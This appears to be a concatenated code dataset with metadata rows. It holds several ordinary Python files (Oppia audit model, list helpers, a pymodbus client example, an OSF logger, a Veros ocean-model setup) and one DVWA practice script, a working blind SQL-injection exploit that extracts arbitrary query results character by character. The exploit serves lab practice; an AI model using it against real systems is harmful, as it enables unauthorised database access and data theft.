feconf.ROLE_ACTION_UPDATE,
feconf.ROLE_ACTION_VIEW_BY_ROLE,
feconf.ROLE_ACTION_VIEW_BY_USERNAME
], indexed=True)
# The role being queried for.
role = ndb.StringProperty(default=None, indexed=True)
# The username in the query.
username = ndb.StringProperty(default=None, indexed=True)
@staticmethod
def get_deletion_policy():
"""Audit logs are kept for investigation purposes."""
return base_models.DELETION_POLICY.KEEP
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether RoleQueryAuditModel exist for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(cls.user_id == user_id).get() is not None
| 35.787879 | 78 | 0.720576 |
from __future__ import absolute_import
from __future__ import unicode_literals
from core.platform import models
import feconf
from google.appengine.ext import ndb
(base_models,) = models.Registry.import_models([models.NAMES.base_model])
class RoleQueryAuditModel(base_models.BaseModel):
user_id = ndb.StringProperty(required=True, indexed=True)
intent = ndb.StringProperty(required=True, choices=[
feconf.ROLE_ACTION_UPDATE,
feconf.ROLE_ACTION_VIEW_BY_ROLE,
feconf.ROLE_ACTION_VIEW_BY_USERNAME
], indexed=True)
role = ndb.StringProperty(default=None, indexed=True)
username = ndb.StringProperty(default=None, indexed=True)
@staticmethod
def get_deletion_policy():
return base_models.DELETION_POLICY.KEEP
@classmethod
def has_reference_to_user_id(cls, user_id):
return cls.query(cls.user_id == user_id).get() is not None
| true | true |
f7230caf121b3c4569353e8905f16b1c0196377f | 545 | py | Python | Modules/my_list/__init__.py | guilhermebaos/Curso-em-Video-Python | 0e67f6f59fa3216889bd2dde4a26b532c7c545fd | [
"MIT"
] | null | null | null | Modules/my_list/__init__.py | guilhermebaos/Curso-em-Video-Python | 0e67f6f59fa3216889bd2dde4a26b532c7c545fd | [
"MIT"
] | null | null | null | Modules/my_list/__init__.py | guilhermebaos/Curso-em-Video-Python | 0e67f6f59fa3216889bd2dde4a26b532c7c545fd | [
"MIT"
] | null | null | null | # Manter Ordem Alfabética
def join_list(lst, string=', '):
"""
:param lst: List to be joined
:param string: String that will be used to join the items in the list
:return: List after being converted into a string
"""
lst = str(string).join(str(x) for x in lst)
return lst
def unique_list(lst):
to_eliminate = []
for c, item in enumerate(lst):
if lst.index(item) != c:
to_eliminate += [c]
to_eliminate.sort(reverse=True)
for c in to_eliminate:
lst.pop(c)
return lst
| 23.695652 | 73 | 0.616514 |
def join_list(lst, string=', '):
lst = str(string).join(str(x) for x in lst)
return lst
def unique_list(lst):
to_eliminate = []
for c, item in enumerate(lst):
if lst.index(item) != c:
to_eliminate += [c]
to_eliminate.sort(reverse=True)
for c in to_eliminate:
lst.pop(c)
return lst
| true | true |
f7230cb93d1f301c186795e3936835d13ed751db | 2,856 | py | Python | examples/common/async_twisted_client_serial.py | sumpfralle/pymodbus | fbdc470ae3e138c50e3659ec4ec8ebf39df58936 | [
"BSD-3-Clause"
] | 1 | 2021-01-07T01:04:55.000Z | 2021-01-07T01:04:55.000Z | examples/common/async_twisted_client_serial.py | sumpfralle/pymodbus | fbdc470ae3e138c50e3659ec4ec8ebf39df58936 | [
"BSD-3-Clause"
] | null | null | null | examples/common/async_twisted_client_serial.py | sumpfralle/pymodbus | fbdc470ae3e138c50e3659ec4ec8ebf39df58936 | [
"BSD-3-Clause"
] | 2 | 2020-12-11T19:44:35.000Z | 2022-03-29T02:24:32.000Z | #!/usr/bin/env python
"""
Pymodbus Asynchronous Client Examples
--------------------------------------------------------------------------
The following is an example of how to use the asynchronous serial modbus
client implementation from pymodbus with twisted.
"""
from twisted.internet import reactor
from pymodbus.client.asynchronous import schedulers
from pymodbus.client.asynchronous.serial import AsyncModbusSerialClient
from pymodbus.client.asynchronous.twisted import ModbusClientProtocol
import logging
logging.basicConfig()
log = logging.getLogger("pymodbus")
log.setLevel(logging.DEBUG)
# ---------------------------------------------------------------------------#
# state a few constants
# ---------------------------------------------------------------------------#
SERIAL_PORT = "/dev/ptyp0"
STATUS_REGS = (1, 2)
STATUS_COILS = (1, 3)
CLIENT_DELAY = 1
UNIT = 0x01
class ExampleProtocol(ModbusClientProtocol):
def __init__(self, framer):
""" Initializes our custom protocol
:param framer: The decoder to use to process messages
:param endpoint: The endpoint to send results to
"""
ModbusClientProtocol.__init__(self, framer)
log.debug("Beginning the processing loop")
reactor.callLater(CLIENT_DELAY, self.fetch_holding_registers)
def fetch_holding_registers(self):
""" Defer fetching holding registers
"""
log.debug("Starting the next cycle")
d = self.read_holding_registers(*STATUS_REGS, unit=UNIT)
d.addCallbacks(self.send_holding_registers, self.error_handler)
def send_holding_registers(self, response):
""" Write values of holding registers, defer fetching coils
:param response: The response to process
"""
log.info(response.getRegister(0))
log.info(response.getRegister(1))
d = self.read_coils(*STATUS_COILS, unit=UNIT)
d.addCallbacks(self.start_next_cycle, self.error_handler)
def start_next_cycle(self, response):
""" Write values of coils, trigger next cycle
:param response: The response to process
"""
log.info(response.getBit(0))
log.info(response.getBit(1))
log.info(response.getBit(2))
reactor.callLater(CLIENT_DELAY, self.fetch_holding_registers)
def error_handler(self, failure):
""" Handle any twisted errors
:param failure: The error to handle
"""
log.error(failure)
if __name__ == "__main__":
proto, client = AsyncModbusSerialClient(schedulers.REACTOR,
method="rtu",
port=SERIAL_PORT,
timeout=2,
proto_cls=ExampleProtocol)
proto.start()
# proto.stop()
| 32.827586 | 78 | 0.602941 |
from twisted.internet import reactor
from pymodbus.client.asynchronous import schedulers
from pymodbus.client.asynchronous.serial import AsyncModbusSerialClient
from pymodbus.client.asynchronous.twisted import ModbusClientProtocol
import logging
logging.basicConfig()
log = logging.getLogger("pymodbus")
log.setLevel(logging.DEBUG)
SERIAL_PORT = "/dev/ptyp0"
STATUS_REGS = (1, 2)
STATUS_COILS = (1, 3)
CLIENT_DELAY = 1
UNIT = 0x01
class ExampleProtocol(ModbusClientProtocol):
def __init__(self, framer):
ModbusClientProtocol.__init__(self, framer)
log.debug("Beginning the processing loop")
reactor.callLater(CLIENT_DELAY, self.fetch_holding_registers)
def fetch_holding_registers(self):
log.debug("Starting the next cycle")
d = self.read_holding_registers(*STATUS_REGS, unit=UNIT)
d.addCallbacks(self.send_holding_registers, self.error_handler)
def send_holding_registers(self, response):
log.info(response.getRegister(0))
log.info(response.getRegister(1))
d = self.read_coils(*STATUS_COILS, unit=UNIT)
d.addCallbacks(self.start_next_cycle, self.error_handler)
def start_next_cycle(self, response):
log.info(response.getBit(0))
log.info(response.getBit(1))
log.info(response.getBit(2))
reactor.callLater(CLIENT_DELAY, self.fetch_holding_registers)
def error_handler(self, failure):
log.error(failure)
if __name__ == "__main__":
proto, client = AsyncModbusSerialClient(schedulers.REACTOR,
method="rtu",
port=SERIAL_PORT,
timeout=2,
proto_cls=ExampleProtocol)
proto.start()
| true | true |
f7230d49bc264b22acf7895aca19ce722423ce65 | 1,495 | py | Python | website/addons/osfstorage/logs.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | null | null | null | website/addons/osfstorage/logs.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | 1 | 2019-08-16T13:45:12.000Z | 2019-08-16T13:45:12.000Z | website/addons/osfstorage/logs.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
def build_log_urls(node, path):
url = node.web_url_for(
'addon_view_or_download_file',
path=path,
provider='osfstorage'
)
return {
'view': url,
'download': url + '?action=download'
}
class OsfStorageNodeLogger(object):
def __init__(self, node, auth, path=None):
self.node = node
self.auth = auth
self.path = path
def log(self, action, extra=None, save=False):
"""Log an event. Wraps the Node#add_log method, automatically adding
relevant parameters and prefixing log events with `"osf_storage_"`.
:param str action: Log action. Should be a class constant from NodeLog.
:param dict extra: Extra parameters to add to the ``params`` dict of the
new NodeLog.
"""
params = {
'project': self.node.parent_id,
'node': self.node._primary_key,
}
# If logging a file-related action, add the file's view and download URLs
if self.path:
params.update({
'urls': build_log_urls(self.node, self.path),
'path': self.path,
})
if extra:
params.update(extra)
# Prefix the action with osf_storage_
self.node.add_log(
action='osf_storage_{0}'.format(action),
params=params,
auth=self.auth,
)
if save:
self.node.save()
| 28.75 | 81 | 0.564548 |
def build_log_urls(node, path):
url = node.web_url_for(
'addon_view_or_download_file',
path=path,
provider='osfstorage'
)
return {
'view': url,
'download': url + '?action=download'
}
class OsfStorageNodeLogger(object):
def __init__(self, node, auth, path=None):
self.node = node
self.auth = auth
self.path = path
def log(self, action, extra=None, save=False):
params = {
'project': self.node.parent_id,
'node': self.node._primary_key,
}
if self.path:
params.update({
'urls': build_log_urls(self.node, self.path),
'path': self.path,
})
if extra:
params.update(extra)
# Prefix the action with osf_storage_
self.node.add_log(
action='osf_storage_{0}'.format(action),
params=params,
auth=self.auth,
)
if save:
self.node.save()
| true | true |
f7230d57dbfb6edde771c92b8109ff68260dfdc4 | 2,412 | py | Python | DVWA/bsqli/medium.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | 1 | 2020-10-03T07:57:42.000Z | 2020-10-03T07:57:42.000Z | DVWA/bsqli/medium.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | null | null | null | DVWA/bsqli/medium.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import requests
import string
import sys
import urllib
"""
POST /vulnerabilities/sqli_blind/ HTTP/1.1
Host: lab
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://lab
Connection: close
Referer: http://lab/vulnerabilities/sqli_blind/
Cookie: PHPSESSID=m5do28oacr1fcpal9q7iav29u3; security=medium
Upgrade-Insecure-Requests: 1
id=1&Submit=Submit
"""
urlencode = urllib.parse.quote
def loop_inject(original_inject):
letters = ''.join(string.ascii_letters + string.digits + string.punctuation)
for char in letters:
edit_inject = original_inject.replace("CHAR", str(ord(char)))
burp_url = "http://lab/vulnerabilities/sqli_blind/"
burp_data = {"id":"{}".format(edit_inject),
"Submit":"Submit"}
burp_cookies = {"PHPSESSID":"m5do28oacr1fcpal9q7iav29u3",
"security":"medium"}
burp_headers = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Connection":"Close",
"Upgrade-Insecure-Requests":"1"}
burp_proxy = {"http":"http://127.0.0.1:8080",
"https":"https://127.0.0.1:8080"}
r = requests.post(burp_url, data=burp_data, headers=burp_headers, cookies=burp_cookies, proxies=burp_proxy)
if int(r.headers['Content-Length']) != 4705:
return char
return "\n\n"
def main():
while True:
query = input("sql> ")
if "quit" in query:
sys.exit(-1)
for i in range(1,256):
# send our injection -- known good injection: 1 AND SLEEP(4)#
original_inject = str("1 AND ASCII(SUBSTRING(({}),{},1))=CHAR#").format(query, i)
get_char = str(loop_inject(original_inject))
# once we exit with a true value, write to console
sys.stdout.write(get_char)
sys.stdout.flush()
if loop_inject(original_inject) == "\n\n":
break
main() | 29.414634 | 115 | 0.63267 |
import requests
import string
import sys
import urllib
urlencode = urllib.parse.quote
def loop_inject(original_inject):
letters = ''.join(string.ascii_letters + string.digits + string.punctuation)
for char in letters:
edit_inject = original_inject.replace("CHAR", str(ord(char)))
burp_url = "http://lab/vulnerabilities/sqli_blind/"
burp_data = {"id":"{}".format(edit_inject),
"Submit":"Submit"}
burp_cookies = {"PHPSESSID":"m5do28oacr1fcpal9q7iav29u3",
"security":"medium"}
burp_headers = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language":"en-US,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Connection":"Close",
"Upgrade-Insecure-Requests":"1"}
burp_proxy = {"http":"http://127.0.0.1:8080",
"https":"https://127.0.0.1:8080"}
r = requests.post(burp_url, data=burp_data, headers=burp_headers, cookies=burp_cookies, proxies=burp_proxy)
if int(r.headers['Content-Length']) != 4705:
return char
return "\n\n"
def main():
while True:
query = input("sql> ")
if "quit" in query:
sys.exit(-1)
for i in range(1,256):
original_inject = str("1 AND ASCII(SUBSTRING(({}),{},1))=CHAR#").format(query, i)
get_char = str(loop_inject(original_inject))
sys.stdout.write(get_char)
sys.stdout.flush()
if loop_inject(original_inject) == "\n\n":
break
main() | true | true |
f7230d9cc74110fcd7eacb880b7388d767c4d9d2 | 13,781 | py | Python | veros/setups/north_atlantic/north_atlantic.py | AkasDutta/veros | 9f530596a0148a398829050017de3e01a71261a0 | [
"MIT"
] | 115 | 2019-11-23T02:31:30.000Z | 2022-03-29T12:58:30.000Z | veros/setups/north_atlantic/north_atlantic.py | AkasDutta/veros | 9f530596a0148a398829050017de3e01a71261a0 | [
"MIT"
] | 207 | 2019-11-21T13:21:22.000Z | 2022-03-31T23:36:09.000Z | veros/setups/north_atlantic/north_atlantic.py | AkasDutta/veros | 9f530596a0148a398829050017de3e01a71261a0 | [
"MIT"
] | 21 | 2020-01-28T13:13:39.000Z | 2022-02-02T13:46:33.000Z | #!/usr/bin/env python
import os
import h5netcdf
from PIL import Image
import scipy.spatial
import scipy.ndimage
from veros import VerosSetup, veros_routine, veros_kernel, KernelOutput
from veros.variables import Variable
from veros.core.operators import numpy as npx, update, at
import veros.tools
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_FILES = veros.tools.get_assets("north_atlantic", os.path.join(BASE_PATH, "assets.json"))
TOPO_MASK_FILE = os.path.join(BASE_PATH, "topo_mask.png")
class NorthAtlanticSetup(VerosSetup):
"""A regional model of the North Atlantic, inspired by `Smith et al., 2000`_.
Forcing and initial conditions are taken from the FLAME PyOM2 setup. Bathymetry
data from ETOPO1 (resolution of 1 arcmin).
Boundary forcings are implemented via sponge layers in the Greenland Sea, by the
Strait of Gibraltar, and in the South Atlantic. This setup runs with arbitrary resolution;
upon changing the number of grid cells, all forcing files will be interpolated to
the new grid. Default resolution corresponds roughly to :math:`0.5 \\times 0.25` degrees.
.. _Smith et al., 2000:
http://journals.ametsoc.org/doi/10.1175/1520-0485%282000%29030%3C1532%3ANSOTNA%3E2.0.CO%3B2
"""
x_boundary = 17.2
y_boundary = 70.0
max_depth = 5800.0
@veros_routine
def set_parameter(self, state):
settings = state.settings
settings.identifier = "na"
settings.nx, settings.ny, settings.nz = 250, 350, 50
settings.x_origin = -98.0
settings.y_origin = -18.0
settings.dt_mom = 3600.0 / 2.0
settings.dt_tracer = 3600.0 / 2.0
settings.runlen = 86400 * 365.0 * 10.0
settings.coord_degree = True
settings.enable_neutral_diffusion = True
settings.enable_skew_diffusion = True
settings.K_iso_0 = 1000.0
settings.K_iso_steep = 200.0
settings.iso_dslope = 1.0 / 1000.0
settings.iso_slopec = 4.0 / 1000.0
settings.enable_hor_friction = True
settings.A_h = 1e3
settings.enable_hor_friction_cos_scaling = True
settings.hor_friction_cosPower = 1
settings.enable_tempsalt_sources = True
settings.enable_implicit_vert_friction = True
settings.enable_tke = True
settings.c_k = 0.1
settings.c_eps = 0.7
settings.alpha_tke = 30.0
settings.mxl_min = 1e-8
settings.tke_mxl_choice = 2
settings.kappaM_min = 2e-4
settings.kappaH_min = 2e-5
settings.enable_kappaH_profile = True
settings.K_gm_0 = 1000.0
settings.enable_eke = False
settings.enable_idemix = False
settings.eq_of_state_type = 5
state.dimensions["nmonths"] = 12
state.var_meta.update(
{
"sss_clim": Variable("sss_clim", ("xt", "yt", "nmonths"), "g/kg", "Monthly sea surface salinity"),
"sst_clim": Variable("sst_clim", ("xt", "yt", "nmonths"), "deg C", "Monthly sea surface temperature"),
"sss_rest": Variable(
"sss_rest", ("xt", "yt", "nmonths"), "g/kg", "Monthly sea surface salinity restoring"
),
"sst_rest": Variable(
"sst_rest", ("xt", "yt", "nmonths"), "deg C", "Monthly sea surface temperature restoring"
),
"t_star": Variable(
"t_star", ("xt", "yt", "zt", "nmonths"), "deg C", "Temperature sponge layer forcing"
),
"s_star": Variable("s_star", ("xt", "yt", "zt", "nmonths"), "g/kg", "Salinity sponge layer forcing"),
"rest_tscl": Variable("rest_tscl", ("xt", "yt", "zt"), "1/s", "Forcing restoration time scale"),
"taux": Variable("taux", ("xt", "yt", "nmonths"), "N/s^2", "Monthly zonal wind stress"),
"tauy": Variable("tauy", ("xt", "yt", "nmonths"), "N/s^2", "Monthly meridional wind stress"),
}
)
@veros_routine
def set_grid(self, state):
vs = state.variables
settings = state.settings
vs.dxt = update(vs.dxt, at[2:-2], (self.x_boundary - settings.x_origin) / settings.nx)
vs.dyt = update(vs.dyt, at[2:-2], (self.y_boundary - settings.y_origin) / settings.ny)
vs.dzt = veros.tools.get_vinokur_grid_steps(settings.nz, self.max_depth, 10.0, refine_towards="lower")
@veros_routine
def set_coriolis(self, state):
vs = state.variables
settings = state.settings
vs.coriolis_t = update(
vs.coriolis_t, at[...], 2 * settings.omega * npx.sin(vs.yt[npx.newaxis, :] / 180.0 * settings.pi)
)
@veros_routine(dist_safe=False, local_variables=["kbot", "xt", "yt", "zt"])
def set_topography(self, state):
vs = state.variables
settings = state.settings
with h5netcdf.File(DATA_FILES["topography"], "r") as topo_file:
topo_x, topo_y, topo_bottom_depth = (self._get_data(topo_file, k) for k in ("x", "y", "z"))
topo_mask = npx.flipud(npx.asarray(Image.open(TOPO_MASK_FILE))).T
topo_bottom_depth = npx.where(topo_mask, 0, topo_bottom_depth)
topo_bottom_depth = scipy.ndimage.gaussian_filter(
topo_bottom_depth, sigma=(len(topo_x) / settings.nx, len(topo_y) / settings.ny)
)
interp_coords = npx.meshgrid(vs.xt[2:-2], vs.yt[2:-2], indexing="ij")
interp_coords = npx.rollaxis(npx.asarray(interp_coords), 0, 3)
z_interp = scipy.interpolate.interpn(
(topo_x, topo_y), topo_bottom_depth, interp_coords, method="nearest", bounds_error=False, fill_value=0
)
vs.kbot = update(
vs.kbot,
at[2:-2, 2:-2],
npx.where(
z_interp < 0.0,
1 + npx.argmin(npx.abs(z_interp[:, :, npx.newaxis] - vs.zt[npx.newaxis, npx.newaxis, :]), axis=2),
0,
),
)
vs.kbot = npx.where(vs.kbot < settings.nz, vs.kbot, 0)
def _get_data(self, f, var):
"""Retrieve variable from h5netcdf file"""
var_obj = f.variables[var]
return npx.array(var_obj).T
@veros_routine(
dist_safe=False,
local_variables=[
"tau",
"xt",
"yt",
"zt",
"temp",
"maskT",
"salt",
"taux",
"tauy",
"sst_clim",
"sss_clim",
"sst_rest",
"sss_rest",
"t_star",
"s_star",
"rest_tscl",
],
)
def set_initial_conditions(self, state):
vs = state.variables
with h5netcdf.File(DATA_FILES["forcing"], "r") as forcing_file:
t_hor = (vs.xt[2:-2], vs.yt[2:-2])
t_grid = (vs.xt[2:-2], vs.yt[2:-2], vs.zt)
forc_coords = [self._get_data(forcing_file, k) for k in ("xt", "yt", "zt")]
forc_coords[0] = forc_coords[0] - 360
forc_coords[2] = -0.01 * forc_coords[2][::-1]
temp_raw = self._get_data(forcing_file, "temp_ic")[..., ::-1]
temp = veros.tools.interpolate(forc_coords, temp_raw, t_grid, missing_value=-1e20)
vs.temp = update(vs.temp, at[2:-2, 2:-2, :, vs.tau], vs.maskT[2:-2, 2:-2, :] * temp)
salt_raw = self._get_data(forcing_file, "salt_ic")[..., ::-1]
salt = 35.0 + 1000 * veros.tools.interpolate(forc_coords, salt_raw, t_grid, missing_value=-1e20)
vs.salt = update(vs.salt, at[2:-2, 2:-2, :, vs.tau], vs.maskT[2:-2, 2:-2, :] * salt)
forc_u_coords_hor = [self._get_data(forcing_file, k) for k in ("xu", "yu")]
forc_u_coords_hor[0] = forc_u_coords_hor[0] - 360
taux = self._get_data(forcing_file, "taux")
tauy = self._get_data(forcing_file, "tauy")
for k in range(12):
vs.taux = update(
vs.taux,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_u_coords_hor, taux[..., k], t_hor, missing_value=-1e20) / 10.0),
)
vs.tauy = update(
vs.tauy,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_u_coords_hor, tauy[..., k], t_hor, missing_value=-1e20) / 10.0),
)
# heat flux and salinity restoring
sst_clim, sss_clim, sst_rest, sss_rest = [
forcing_file.variables[k][...].T for k in ("sst_clim", "sss_clim", "sst_rest", "sss_rest")
]
for k in range(12):
vs.sst_clim = update(
vs.sst_clim,
at[2:-2, 2:-2, k],
veros.tools.interpolate(forc_coords[:-1], sst_clim[..., k], t_hor, missing_value=-1e20),
)
vs.sss_clim = update(
vs.sss_clim,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_coords[:-1], sss_clim[..., k], t_hor, missing_value=-1e20) * 1000 + 35),
)
vs.sst_rest = update(
vs.sst_rest,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_coords[:-1], sst_rest[..., k], t_hor, missing_value=-1e20) * 41868.0),
)
vs.sss_rest = update(
vs.sss_rest,
at[2:-2, 2:-2, k],
(veros.tools.interpolate(forc_coords[:-1], sss_rest[..., k], t_hor, missing_value=-1e20) / 100.0),
)
with h5netcdf.File(DATA_FILES["restoring"], "r") as restoring_file:
rest_coords = [self._get_data(restoring_file, k) for k in ("xt", "yt", "zt")]
rest_coords[0] = rest_coords[0] - 360
# sponge layers
vs.rest_tscl = update(
vs.rest_tscl,
at[2:-2, 2:-2, :],
veros.tools.interpolate(rest_coords, self._get_data(restoring_file, "tscl")[..., 0], t_grid),
)
t_star = self._get_data(restoring_file, "t_star")
s_star = self._get_data(restoring_file, "s_star")
for k in range(12):
vs.t_star = update(
vs.t_star,
at[2:-2, 2:-2, :, k],
veros.tools.interpolate(rest_coords, t_star[..., k], t_grid, missing_value=0.0),
)
vs.s_star = update(
vs.s_star,
at[2:-2, 2:-2, :, k],
veros.tools.interpolate(rest_coords, s_star[..., k], t_grid, missing_value=0.0),
)
@veros_routine
def set_forcing(self, state):
vs = state.variables
vs.update(set_forcing_kernel(state))
@veros_routine
def set_diagnostics(self, state):
diagnostics = state.diagnostics
settings = state.settings
diagnostics["snapshot"].output_frequency = 3600.0 * 24 * 10
diagnostics["averages"].output_frequency = 3600.0 * 24 * 10
diagnostics["averages"].sampling_frequency = settings.dt_tracer
diagnostics["averages"].output_variables = [
"temp",
"salt",
"u",
"v",
"w",
"surface_taux",
"surface_tauy",
"psi",
]
diagnostics["cfl_monitor"].output_frequency = settings.dt_tracer * 10
@veros_routine
def after_timestep(self, state):
pass
@veros_kernel
def set_forcing_kernel(state):
vs = state.variables
settings = state.settings
year_in_seconds = 360 * 86400.0
(n1, f1), (n2, f2) = veros.tools.get_periodic_interval(vs.time, year_in_seconds, year_in_seconds / 12.0, 12)
vs.surface_taux = f1 * vs.taux[:, :, n1] + f2 * vs.taux[:, :, n2]
vs.surface_tauy = f1 * vs.tauy[:, :, n1] + f2 * vs.tauy[:, :, n2]
if settings.enable_tke:
vs.forc_tke_surface = update(
vs.forc_tke_surface,
at[1:-1, 1:-1],
npx.sqrt(
(0.5 * (vs.surface_taux[1:-1, 1:-1] + vs.surface_taux[:-2, 1:-1]) / settings.rho_0) ** 2
+ (0.5 * (vs.surface_tauy[1:-1, 1:-1] + vs.surface_tauy[1:-1, :-2]) / settings.rho_0) ** 2
)
** 1.5,
)
cp_0 = 3991.86795711963
vs.forc_temp_surface = (
(f1 * vs.sst_rest[:, :, n1] + f2 * vs.sst_rest[:, :, n2])
* (f1 * vs.sst_clim[:, :, n1] + f2 * vs.sst_clim[:, :, n2] - vs.temp[:, :, -1, vs.tau])
* vs.maskT[:, :, -1]
/ cp_0
/ settings.rho_0
)
vs.forc_salt_surface = (
(f1 * vs.sss_rest[:, :, n1] + f2 * vs.sss_rest[:, :, n2])
* (f1 * vs.sss_clim[:, :, n1] + f2 * vs.sss_clim[:, :, n2] - vs.salt[:, :, -1, vs.tau])
* vs.maskT[:, :, -1]
)
ice_mask = (vs.temp[:, :, -1, vs.tau] * vs.maskT[:, :, -1] <= -1.8) & (vs.forc_temp_surface <= 0.0)
vs.forc_temp_surface = npx.where(ice_mask, 0.0, vs.forc_temp_surface)
vs.forc_salt_surface = npx.where(ice_mask, 0.0, vs.forc_salt_surface)
if settings.enable_tempsalt_sources:
vs.temp_source = (
vs.maskT
* vs.rest_tscl
* (f1 * vs.t_star[:, :, :, n1] + f2 * vs.t_star[:, :, :, n2] - vs.temp[:, :, :, vs.tau])
)
vs.salt_source = (
vs.maskT
* vs.rest_tscl
* (f1 * vs.s_star[:, :, :, n1] + f2 * vs.s_star[:, :, :, n2] - vs.salt[:, :, :, vs.tau])
)
return KernelOutput(
surface_taux=vs.surface_taux,
surface_tauy=vs.surface_tauy,
temp_source=vs.temp_source,
salt_source=vs.salt_source,
forc_tke_surface=vs.forc_tke_surface,
forc_temp_surface=vs.forc_temp_surface,
forc_salt_surface=vs.forc_salt_surface,
)
| 38.387187 | 118 | 0.550468 |
import os
import h5netcdf
from PIL import Image
import scipy.spatial
import scipy.ndimage
from veros import VerosSetup, veros_routine, veros_kernel, KernelOutput
from veros.variables import Variable
from veros.core.operators import numpy as npx, update, at
import veros.tools
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_FILES = veros.tools.get_assets("north_atlantic", os.path.join(BASE_PATH, "assets.json"))
TOPO_MASK_FILE = os.path.join(BASE_PATH, "topo_mask.png")
class NorthAtlanticSetup(VerosSetup):
x_boundary = 17.2
y_boundary = 70.0
max_depth = 5800.0
@veros_routine
def set_parameter(self, state):
settings = state.settings
settings.identifier = "na"
settings.nx, settings.ny, settings.nz = 250, 350, 50
settings.x_origin = -98.0
settings.y_origin = -18.0
settings.dt_mom = 3600.0 / 2.0
settings.dt_tracer = 3600.0 / 2.0
settings.runlen = 86400 * 365.0 * 10.0
settings.coord_degree = True
settings.enable_neutral_diffusion = True
settings.enable_skew_diffusion = True
settings.K_iso_0 = 1000.0
settings.K_iso_steep = 200.0
settings.iso_dslope = 1.0 / 1000.0
settings.iso_slopec = 4.0 / 1000.0
settings.enable_hor_friction = True
settings.A_h = 1e3
settings.enable_hor_friction_cos_scaling = True
settings.hor_friction_cosPower = 1
settings.enable_tempsalt_sources = True
settings.enable_implicit_vert_friction = True
settings.enable_tke = True
settings.c_k = 0.1
settings.c_eps = 0.7
settings.alpha_tke = 30.0
settings.mxl_min = 1e-8
settings.tke_mxl_choice = 2
settings.kappaM_min = 2e-4
settings.kappaH_min = 2e-5
settings.enable_kappaH_profile = True
settings.K_gm_0 = 1000.0
settings.enable_eke = False
settings.enable_idemix = False
settings.eq_of_state_type = 5
state.dimensions["nmonths"] = 12
state.var_meta.update(
{
"sss_clim": Variable("sss_clim", ("xt", "yt", "nmonths"), "g/kg", "Monthly sea surface salinity"),
"sst_clim": Variable("sst_clim", ("xt", "yt", "nmonths"), "deg C", "Monthly sea surface temperature"),
"sss_rest": Variable(
"sss_rest", ("xt", "yt", "nmonths"), "g/kg", "Monthly sea surface salinity restoring"
),
"sst_rest": Variable(
"sst_rest", ("xt", "yt", "nmonths"), "deg C", "Monthly sea surface temperature restoring"
),
"t_star": Variable(
"t_star", ("xt", "yt", "zt", "nmonths"), "deg C", "Temperature sponge layer forcing"
),
"s_star": Variable("s_star", ("xt", "yt", "zt", "nmonths"), "g/kg", "Salinity sponge layer forcing"),
"rest_tscl": Variable("rest_tscl", ("xt", "yt", "zt"), "1/s", "Forcing restoration time scale"),
"taux": Variable("taux", ("xt", "yt", "nmonths"), "N/s^2", "Monthly zonal wind stress"),
"tauy": Variable("tauy", ("xt", "yt", "nmonths"), "N/s^2", "Monthly meridional wind stress"),
}
)
@veros_routine
def set_grid(self, state):
vs = state.variables
settings = state.settings
vs.dxt = update(vs.dxt, at[2:-2], (self.x_boundary - settings.x_origin) / settings.nx)
vs.dyt = update(vs.dyt, at[2:-2], (self.y_boundary - settings.y_origin) / settings.ny)
vs.dzt = veros.tools.get_vinokur_grid_steps(settings.nz, self.max_depth, 10.0, refine_towards="lower")
@veros_routine
def set_coriolis(self, state):
vs = state.variables
settings = state.settings
vs.coriolis_t = update(
vs.coriolis_t, at[...], 2 * settings.omega * npx.sin(vs.yt[npx.newaxis, :] / 180.0 * settings.pi)
)
@veros_routine(dist_safe=False, local_variables=["kbot", "xt", "yt", "zt"])
def set_topography(self, state):
vs = state.variables
settings = state.settings
with h5netcdf.File(DATA_FILES["topography"], "r") as topo_file:
topo_x, topo_y, topo_bottom_depth = (self._get_data(topo_file, k) for k in ("x", "y", "z"))
topo_mask = npx.flipud(npx.asarray(Image.open(TOPO_MASK_FILE))).T
topo_bottom_depth = npx.where(topo_mask, 0, topo_bottom_depth)
topo_bottom_depth = scipy.ndimage.gaussian_filter(
topo_bottom_depth, sigma=(len(topo_x) / settings.nx, len(topo_y) / settings.ny)
)
interp_coords = npx.meshgrid(vs.xt[2:-2], vs.yt[2:-2], indexing="ij")
interp_coords = npx.rollaxis(npx.asarray(interp_coords), 0, 3)
z_interp = scipy.interpolate.interpn(
(topo_x, topo_y), topo_bottom_depth, interp_coords, method="nearest", bounds_error=False, fill_value=0
)
vs.kbot = update(
vs.kbot,
at[2:-2, 2:-2],
npx.where(
